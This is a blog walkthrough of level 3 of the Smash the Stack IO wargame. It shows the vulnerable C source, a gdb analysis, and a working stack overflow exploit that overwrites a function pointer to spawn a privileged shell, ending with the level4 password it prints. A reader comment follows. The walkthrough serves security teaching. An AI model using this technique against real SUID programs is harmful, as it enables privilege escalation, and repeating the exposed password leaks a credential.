For the third level of Smash the Stack (IO), we are given both the source code and a binary to work with. As always, we will use the password obtained in the previous writeup to login to the server as 'level3'. Let's take a look and see if we can find a way to extract the password for level 4.
Analyzing Level 3
As noted, we are given both the source code (level03.c), and a corresponding binary (level03). Let's start analysis by dissecting the source code:
level3@io:/levels$ cat level03.c
//bla, based on work by beach
#include <stdio.h>
#include <string.h>
void good()
{
puts("Win.");
execl("/bin/sh", "sh", NULL);
}
void bad()
{
printf("I'm so sorry, you're at %p and you want to be at %p\n", bad, good);
}
int main(int argc, char **argv, char **envp)
{
void (*functionpointer)(void) = bad;
char buffer[50];
if(argc != 2 || strlen(argv[1]) < 4)
return 0;
memcpy(buffer, argv[1], strlen(argv[1]));
memset(buffer, 0, strlen(argv[1]) - 4);
printf("This is exciting we're going to %p\n", functionpointer);
functionpointer();
return 0;
}
Immediately, we can see that we want to find some way to execute the 'good' function, as it spawns a shell which would give us level4 permissions since this is a SUID binary. It appears as though the 'bad' function, when executed, will give us a memory location we 'are at', as well as the memory location of the good function - where we want to be.
Moving on to the main function, we can see that we start by allocated a function pointer which points to the address of the 'bad' function. We can reason that we want to find some way to make the function pointer point to the 'good' function instead of the 'bad' function. We then create a 50 byte character array called 'buffer'.
After these two local variables have been created, we see our typical check for the appropriate number of arguments (in this case checking to see if we have provided one argument), and then we note that the program ensures that the length of our argument is >= 4. Otherwise, the program returns 0 and exits.
Assuming we pass the 'usage check' by providing one argument with length >= 4, the program then calls the memcpy function. By reading documentation on the function, we see that this function will copy length(our_argument) bytes from our argument into the buffer. After this, the program then calls the memset function. This function will set the first length(our_argument) - 4 bytes of buffer to 0. The function then prints out the address our functionpointer is pointing to, and calls the function at that address. We can see that somewhere before this call, we need to find a way to change the address functionpointer points to.
To investigate, let's take a look at what we think our stack should look like before the memcpy function is called. Remember, the stack grows from high memory addresses to lower addresses.
The key thing to know about memcpy (and many other similar functions such as strcpy()) is that it writes from low to high addresses. With this being the case, the data written to buffer is written towards our function pointer. Another key thing to know about write functions is that many don't have protections to ensure that the data being written can actually fit in the buffer it's being written to. This lack of error checking provides an increase in speed and simplicity to the language, but it can be dangerous.
Let's go back to our code to see why.
memcpy(buffer, argv[1], strlen(argv[1]));
We can see that the number of bytes we copy into the buffer depends only on the size of our input. The program does not check to make sure that our input is less than the storage space of the buffer. Instead, if we provide more data than can be stored in the buffer, memcpy simply keeps overwriting crucial memory until our argument has been stored. With this being the case, we can control what data is written into 'functionpointer'. This is an example of a stack based buffer overflow. Let's take a closer look with our debugger to see how we can exploit this vulnerability:
level3@io:~$ gdb -q /levels/level03
Reading symbols from /levels/level03...(no debugging symbols found)...done.
(gdb) set disassembly-flavor intel
(gdb) disassemble main
Dump of assembler code for function main:
0x080484c8 <main+0>: push ebp
0x080484c9 <main+1>: mov ebp,esp
0x080484cb <main+3>: sub esp,0x78
0x080484ce <main+6>: and esp,0xfffffff0
0x080484d1 <main+9>: mov eax,0x0
0x080484d6 <main+14>: sub esp,eax
0x080484d8 <main+16>: mov DWORD PTR [ebp-0xc],0x80484a4
0x080484df <main+23>: cmp DWORD PTR [ebp+0x8],0x2
0x080484e3 <main+27>: jne 0x80484fc <main+52>
0x080484e5 <main+29>: mov eax,DWORD PTR [ebp+0xc]
0x080484e8 <main+32>: add eax,0x4
0x080484eb <main+35>: mov eax,DWORD PTR [eax]
0x080484ed <main+37>: mov DWORD PTR [esp],eax
0x080484f0 <main+40>: call 0x804839c <strlen@plt>
0x080484f5 <main+45>: cmp eax,0x3
0x080484f8 <main+48>: jbe 0x80484fc <main+52>
0x080484fa <main+50>: jmp 0x8048505 <main+61>
0x080484fc <main+52>: mov DWORD PTR [ebp-0x5c],0x0
0x08048503 <main+59>: jmp 0x8048579 <main+177>
0x08048505 <main+61>: mov eax,DWORD PTR [ebp+0xc]
0x08048508 <main+64>: add eax,0x4
0x0804850b <main+67>: mov eax,DWORD PTR [eax]
---Type <return> to continue, or q <return> to quit---
0x0804850d <main+69>: mov DWORD PTR [esp],eax
0x08048510 <main+72>: call 0x804839c <strlen@plt>
0x08048515 <main+77>: mov DWORD PTR [esp+0x8],eax
0x08048519 <main+81>: mov eax,DWORD PTR [ebp+0xc]
0x0804851c <main+84>: add eax,0x4
0x0804851f <main+87>: mov eax,DWORD PTR [eax]
0x08048521 <main+89>: mov DWORD PTR [esp+0x4],eax
0x08048525 <main+93>: lea eax,[ebp-0x58]
0x08048528 <main+96>: mov DWORD PTR [esp],eax
0x0804852b <main+99>: call 0x804838c <memcpy@plt>
0x08048530 <main+104>: mov eax,DWORD PTR [ebp+0xc]
0x08048533 <main+107>: add eax,0x4
0x08048536 <main+110>: mov eax,DWORD PTR [eax]
0x08048538 <main+112>: mov DWORD PTR [esp],eax
0x0804853b <main+115>: call 0x804839c <strlen@plt>
0x08048540 <main+120>: sub eax,0x4
0x08048543 <main+123>: mov DWORD PTR [esp+0x8],eax
0x08048547 <main+127>: mov DWORD PTR [esp+0x4],0x0
0x0804854f <main+135>: lea eax,[ebp-0x58]
0x08048552 <main+138>: mov DWORD PTR [esp],eax
0x08048555 <main+141>: call 0x804835c <memset@plt>
0x0804855a <main+146>: mov eax,DWORD PTR [ebp-0xc]
0x0804855d <main+149>: mov DWORD PTR [esp+0x4],eax
---Type <return> to continue, or q <return> to quit---
0x08048561 <main+153>: mov DWORD PTR [esp],0x80486c0
0x08048568 <main+160>: call 0x80483ac <printf@plt>
0x0804856d <main+165>: mov eax,DWORD PTR [ebp-0xc]
0x08048570 <main+168>: call eax
0x08048572 <main+170>: mov DWORD PTR [ebp-0x5c],0x0
0x08048579 <main+177>: mov eax,DWORD PTR [ebp-0x5c]
0x0804857c <main+180>: leave
0x0804857d <main+181>: ret
End of assembler dump.
We aren't going to pick this entire disassembled program apart, as it would take an entire blog post by itself (though there might be one in the future if it is requested). However, what we want to do is see how are our stack is structured, as well as verify our theory that memory will be written from low to high addresses. Let's put a breakpoint right after the memcpy function is executed, run the program with the argument 'AAAAA', and see what we find.
(gdb) break *0x08048530
Breakpoint 1 at 0x8048530
(gdb) run AAAAA
Starting program: /levels/level03 AAAAA
Breakpoint 1, 0x08048530 in main ()
(gdb)
(gdb) x/32xw $esp
0xbfffdc60: 0xbfffdc80 0xbfffde96 0x00000005 0x00000001
0xbfffdc70: 0x00000000 0x00000001 0x009e38f8 0x00fccff4
0xbfffdc80: 0x41414141 0x00eb9341 0xbfffdc98 0x00ea0aa5
0xbfffdc90: 0x00fccff4 0x080497c8 0xbfffdca8 0x08048338
0xbfffdca0: 0x009d5380 0x080497c8 0xbfffdcd8 0x080485a9
0xbfffdcb0: 0x00fcd304 0x00fccff4 0x08048590 0xbfffdcd8
0xbfffdcc0: 0x00eb95c5 0x009d5380 0x0804859b 0x080484a4
0xbfffdcd0: 0x08048590 0x00000000 0xbfffdd58 0x00ea0ca6
(gdb) print 0xbfffdccc - 0xbfffdc80
$1 = 76
We can tell, however, that the values are being copied from lower addresses to higher addresses. We then need to find out how many bytes it would take to overwrite our function pointer (as it's not always going to be exactly the length of the buffer + length of the function pointer since the compiler may add some padding). To do this, we first need to find the address of our function pointer. Then, we can subtract our buffer starting address from this to obtain the number of bytes between the two that we need to overwrite before we can change the contents of the function pointer.
We can find the address of the function pointer in two ways:
- Use our GDB disassembly
- Run the program (as it will tell us the address of our function pointer)
For the sake of comprehension, let's do both:
Analysis with GDB:
Analysis with GDB:
0x080484d8 <main+16>: mov DWORD PTR [ebp-0xc],0x80484a4
<trim>
0x0804856d <main+165>: mov eax,DWORD PTR [ebp-0xc]
0x08048570 <main+168>: call eax
We can see at the beginning of our program that we load the address of a function into one of our local variables. Then, at the end our program, we load this address into eax and call the function located at that address. We can use this information to deduce that our function pointer contains the address 0x80484a4.
Analysis by Running the Program:
If we run the program without overwriting the contents of the function pointer, we will see its contents.
level3@io:~$ /levels/level03 AAAAA This is exciting we're going to 0x80484a4 I'm so sorry, you're at
0x80484a4
and you want to be at 0x8048474
As was the case with our GDB analysis, our function pointer appears to contain the address 0x80484a4. We can then use this knowledge to find the address at which our function pointer resides. Referring back to our stack output, we can see that the start of our function pointer occurs at the address 0xbfffdccc. If we subtract the starting address of our buffer, we see that there are 76 bytes that we need to fill with garbage before we can access the contents of the function pointer. Let's verify that real quick. As a side note, typing out 76 'A's can be exhausting, so let's let scripting do the work for us. We can print 76 'A's using Python with the following command:
python -c 'print "A"*76'
Then, if we wrap the command inside $(command), our program will use the output of the command as its first argument. This can be invaluable in crafting exploits.
(gdb) run $(python -c 'print "A"*76') Starting program: /levels/level03 $(python -c 'print "A"*76') Breakpoint 1, 0x08048530 in main () (gdb) x/32xw $esp 0xbfffdc20: 0xbfffdc40 0xbfffde50 0x0000004c 0x00000001 0xbfffdc30: 0x00000000 0x00000001 0x0084f8f8 0x00274ff4 0xbfffdc40:
0x41414141 0x41414141 0x41414141 0x41414141 0xbfffdc50: 0x41414141 0x41414141 0x41414141 0x41414141 0xbfffdc60: 0x41414141 0x41414141 0x41414141 0x41414141 0xbfffdc70: 0x41414141 0x41414141 0x41414141 0x41414141 0xbfffdc80: 0x41414141 0x41414141 0x41414141 0x080484a4
0xbfffdc90: 0x08048590 0x00000000 0xbfffdd18 0x00148ca6
Perfect. As we suspected, we have successfully overwritten data to the start of the function pointer. Now we just need to overwrite the address of the function pointer to the correct address (that of the 'good' function). However, one thing to remember is that x86 processors store data in little-endian byte order. Therefore, we need to remember to reverse the order of the bytes so that they are stored correctly.
Crafting the Final Exploit
As done previously, we will use Python to fill the first 76 bytes, and then we will overwrite the function pointer with the correct address. Our final exploit will look like this:
./level03 $(python -c 'print "A"*76 + "\x74\x84\x04\x08"')
Let's run it and see what happens:
level3@io:~$ cd /levels/
level3@io:/levels$ ./level03 $(python -c 'print "A"*76 + "\x74\x84\x04\x08"')
This is exciting we're going to 0x8048474
Win.
sh-4.1$ whoami
level4
sh-4.1$ cat /home/level4/.pass
766ShzwZAUbf4g
Awesome. Just as we expected, we overwrote the function pointer and called the 'good' function, resulting in our shell. I hope this helped, and as always, if you ever have any questions or comments, leave them below!
-Jordan
I was going to do an article on this too.. =)
ReplyDeleteI do have a question however, the size of the buffer should be 50 but it appears to be 76, why does gcc add this much padding ? :/